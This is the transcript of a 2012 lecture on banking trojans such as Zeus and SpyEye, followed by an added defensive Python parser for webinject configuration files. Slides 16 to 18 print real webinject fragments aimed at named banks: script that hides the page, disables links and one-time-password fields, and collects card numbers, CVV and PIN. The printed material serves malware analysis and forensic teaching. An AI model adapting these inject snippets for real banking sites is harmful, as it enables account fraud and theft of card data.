
Banking Malware

Banking Malware. Introduction to Crimeware in the Banking Sector. PRESI NELLA RETE - Collegio GHISLIERI, 23 November 2012. Dr. Francesco Schifilliti. What is a Banking Trojan? This term refers to the subset of malware seeking to steal data from electronic bank accounts.


Presentation Transcript


  1. Banking Malware. Introduction to Crimeware in the Banking Sector. PRESI NELLA RETE - Collegio GHISLIERI, 23 November 2012. Dr. Francesco Schifilliti

  2. What is a Banking Trojan? This term refers to the subset of malware seeking to steal data from electronic bank accounts. Within this context, other financial services, for instance online stock exchange operations, are also considered electronic banking.

  3. Zeus, SpyEye… and many others • Torpig • Zeus • SpyEye • Ares • Tatanga • Oddjob • Carberp • Zeus • GameOver • Gataka • Shylock • Citadel • Cridex

  4. Parties Involved (at a Minimum)

  5. Black Market • Malware Developing (Freelance developers) • Developers (Affiliates) • CyberCrime Organization

  6. Malware Distribution • Malware Authors • ? • User

  7. Malware Distribution • Malware Authors • Pay-per-Install • Drive-by-Download • Exploit-as-a-Service

  8. Pay-per-Install Cycle • Malware Authors • Kingpin • Exploit-as-a-Service

  9. Infection and Control Phase • Trojan Repository • Infection: Spam Mail • Compromised Web Site • Exploit Pack • Infection

  10. Iterating the Infection Process… • Flat Botnet • P2P Botnet

  11. Infection Cycle of a Malware on the PC

  12. The Smell of $$$ • data theft • C&C Server • User • data & session theft

  13. Man in the Browser • OS • User-land • Kernel-land

  14. Anti-Detection/Deception Techniques • MW Code

  15. Structure of SpyEye • C&C • Packer • Obfuscation • Anti-Dbg • Binary • Malware plugins: config.dat, ccgrabber, collectors, sock5, customconnector, webinjectors.txt

  16. A Small Piece of a Webinjector from a SpyEye 10.7
  …..
  set_url *meine.deutsche-bank.de/trxm/db/*european.transfer.enter.data* GP
  data_before
  <body
  data_end
  data_inject
   style="visibility:hidden"
  data_end
  data_after
  id=
  data_end
  data_before
  </body>
  data_end
  data_inject
  <script src='/error.html/trxm1/dbb.do?act=getall&domain=DB'></script>
  <script src='/error.html/trxm1/dbcommon.js'></script>
  <script src='/error.html/trxm1/dbsepa.js'></script>
  <script>if (typeof _n_ck == "undefined"){document.body.style.visibility = 'visible';}</script>
  data_end
  data_after
  </html>
  data_end
  …..

  17. A Small Piece of a Webinjector from an ATS
  …..
  set_url *commbank.com.au/netbank/UserMaintenance* GP
  data_before
  <h1 class="PageTitle">*My Q*</h1>
  data_end
  data_inject
  <script language="javascript" type="text/javascript">
  window.onload = function() {
    for ( i=0; i < document.links.length; i++ )
      if (document.links[i].id != 'H_LogOffLink' && document.links[i].id != 'ctl00_HeaderControl_LogOffLink')
        document.links[i].onclick = function() { return false; };
  };
  </script>
  <script language="javascript" type="text/javascript">
  var clck_counter = 0;
  function msg() {
    clck_counter++;
    if (clck_counter==2) {
      document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.visibility = "hidden";
      document.getElementById('ctl00_BodyPlaceHolder_txtOTP_field').style.display = "none";
      document.getElementById('ctl00_BodyPlaceHolder_btnGenSMS_field').disabled = true;
      document.getElementById('error').style.top = 42;
      document.getElementById('error').style.left = 42;
      document.getElementById('error').style.visibility = "visible";
      document.getElementById('error').style.display = "block";
    }
    return false;
  }
  …..

  18. Webinject in Cleartext in RAM
  https://bcol.barclaycard.co.uk*cardSummary*∏‹∏:](ÈÈÈ∏Í∏Í√
  <style type="text/css"> #inject { display: none; } .ui-dialog { width: 400px; font-size: 11px; } .ui-dialog .ui-dialog-titlebar-close { visibility: hidden; } .ui-dialog .ui-dialog-titlebar{ visibility: hidden; display: none; } </style>Pfiıº| ÓΩ|HÓΩ|pÓΩ|òÓ≤ıº|¿ÓΩ|ËÓ∏˘º|Ô˙º|8Ô˙º|`ÔπàÔπ∞Ô∫ÿÔ∫–·∞Ô
  <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.7.1/jquery-ui.min.js"></script>
  value=unescape(document.cookie.substring(offset, end))
  jQuery("#inject_cc").focus(); } else if (jQuery("#inject_expdate_mm").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_mm").focus(); } else if (jQuery("#inject_expdate_yy").val().length < 2) { alert('Please enter Exp.Date'); jQuery("#inject_expdate_yy").focus(); } else if (jQuery("#inject_cvv").val().length < 3) { alert('Please enter correct CVV'); jQuery("#inject_cvv").focus(); } else if (jQuery("#inject_pin").val().length < 5) {
  …….
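Added example, not code from the presentation: a small Python parser for the webinject configuration layout shown on slides 16 to 18 (set_url, data_before, data_inject, data_after, data_end). It extracts each targeted URL pattern, the script sources the inject pulls in, and whether the payload blanks the page, which is what a forensic triage of a recovered webinjectors.txt needs first. The sample config, hostnames and paths are constructed.

```python
import re
SECTION_RE = re.compile(r"^data_(before|inject|after)$")
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc=['\"]([^'\"]+)['\"]", re.I)
HIDE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# Constructed sample in the set_url/data_before/data_inject/data_after/data_end layout; hostnames are placeholders.
SAMPLE = """\
set_url *example-bank.test/transfer/* GP
data_before
<body
data_end
data_inject
 style="visibility:hidden"
data_end
data_after
id=
data_end
set_url *example-bank.test/login* G
data_before
<h1 class="PageTitle">*Welcome*</h1>
data_end
data_inject
<script src='/error.html/inj/common.js'></script>
data_end
data_after
</body>
data_end
"""
def parse_webinjects(text):
    # State machine: one dict per set_url; each data_* block is collected until data_end.
    injects, cur, section, buf = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if section is not None:
            if line == "data_end":
                cur[section].append("\n".join(buf))
                section = None
            else:
                buf.append(raw)          # keep leading spaces: they are part of the payload
        elif line.startswith("set_url"):
            rest = line[7:].split(None, 1) + [""]   # tolerates a missing flags field
            cur = {"url": rest[0], "flags": rest[1], "before": [], "inject": [], "after": []}
            injects.append(cur)
        elif cur is not None and SECTION_RE.match(line):
            section, buf = line[5:], []
    return injects
def summarize(injects):
    # Per target: injected script sources, and whether the payload blanks the page
    return [{"url": i["url"], "scripts": SCRIPT_SRC_RE.findall("\n".join(i["inject"])),
             "hides_page": bool(HIDE_RE.search("\n".join(i["inject"])))} for i in injects]
```

A relative src such as /error.html/... is typically answered by the trojan's own browser hooks rather than by the bank's server, so the injected script paths themselves are the artifact to record, not only foreign domains.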

  19. SpyEye: an Example of Modular, Parametric Malware
  What/how to steal is defined by the plugins installed on the bot:
  billinghammer.dll_5f00ca74679332c15ebe2e682a19e8c9
  bugreport.dll_a6c1992119c1550db437aac86d4ffdad
  ccgrabber.dll_5b1593855a6e8f01468878eb88be39df
  creditgrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
  ffcertgrabber.dll_6b5ffc56cec8f60a448fe7a9044625a5
  Plugin_CreditGrab.dll_0e0c1855fa82ca3ad20bbe30106657b2
  rdp.dll_0cb722049e024f2366ba9c187cb3929f
  ddos.dll_716d82810241daa5e2a41327014e9a77
  …
  • C&C Server • Collector • Collector • Collector • User
  Which bank/financial institution to run fraudulent operations against is defined in webinjectors.txt.
  Who receives the data collected by the MW is defined in collectors.txt.

  20. A Reference Scheme for the Analysis: FULL UNDERSTANDING OF THE FORENSIC ARTIFACT

  21. THANK YOU Francesco Schifilliti fschifilliti@forensictech.it
